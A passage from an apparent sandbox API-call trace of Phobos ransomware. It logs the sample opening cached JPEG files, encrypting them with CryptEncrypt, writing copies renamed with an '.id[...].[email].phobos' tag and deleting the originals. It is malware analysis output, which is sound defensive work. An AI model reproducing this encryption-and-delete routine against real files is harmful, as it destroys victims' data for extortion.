Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.023] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0186.023] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.023] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x636, lpOverlapped=0x0) returned 1 [0186.024] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x640, dwBufLen=0x640 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x640) returned 1 [0186.024] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x640, lpOverlapped=0x0) returned 1 [0186.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0186.025] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.025] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.025] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.025] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.026] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.026] CloseHandle (hObject=0x14c) returned 1 [0186.026] CloseHandle (hObject=0xb8) returned 1 [0186.026] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg")) returned 1 [0186.027] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.027] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2090) returned 1 [0186.027] CloseHandle (hObject=0xb8) returned 1 [0186.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg")) returned 0x2020 [0186.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.028] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.028] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0186.028] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.028] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x82a, lpOverlapped=0x0) returned 1 [0186.030] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830, dwBufLen=0x830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830) returned 1 [0186.030] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x830, lpOverlapped=0x0) returned 1 [0186.031] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0186.031] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.031] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.031] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.031] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.032] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.032] CloseHandle (hObject=0xb8) returned 1 [0186.032] CloseHandle (hObject=0x14c) returned 1 [0186.032] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg")) returned 1 [0186.033] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.034] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5662) returned 1 [0186.034] CloseHandle (hObject=0x14c) returned 1 [0186.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg")) returned 0x2020 [0186.034] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0186.034] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.034] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.035] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0186.035] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.035] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x161e, lpOverlapped=0x0) returned 1 [0186.207] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1620, dwBufLen=0x1620 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1620) returned 1 [0186.207] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1620, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1620, lpOverlapped=0x0) returned 1 [0186.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0186.208] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.208] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.208] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.208] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.208] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.208] CloseHandle (hObject=0x14c) returned 1 [0186.209] CloseHandle (hObject=0xb8) returned 1 [0186.209] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg")) returned 1 [0186.210] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.254] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12139) returned 1 [0186.254] CloseHandle (hObject=0xb8) returned 1 [0186.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg")) returned 0x2020 [0186.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.254] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.254] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.301] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.301] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2f6b, lpOverlapped=0x0) returned 1 [0186.316] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f70, dwBufLen=0x2f70 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2f70) returned 1 [0186.317] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2f70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2f70, lpOverlapped=0x0) returned 1 [0186.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0186.318] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.318] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.318] CryptDestroyKey (hKey=0xa327e8) returned 1 [0186.318] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.319] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.319] CloseHandle (hObject=0xb8) returned 1 [0186.319] CloseHandle (hObject=0x160) returned 1 [0186.319] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg")) returned 1 [0186.320] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.320] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5877) returned 1 [0186.320] CloseHandle (hObject=0x160) returned 1 [0186.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg")) returned 0x2020 [0186.321] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.321] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.321] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.322] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.322] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.322] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16f5, lpOverlapped=0x0) returned 1 [0186.352] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1700, dwBufLen=0x1700 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1700) returned 1 [0186.352] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1700, lpOverlapped=0x0) returned 1 [0186.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0186.353] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.353] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.353] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.353] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.353] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.353] CloseHandle (hObject=0x160) returned 1 [0186.353] CloseHandle (hObject=0xb8) returned 1 [0186.353] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBYfEH[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbyfeh[1].jpg")) returned 1 [0186.354] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg" (normalized: 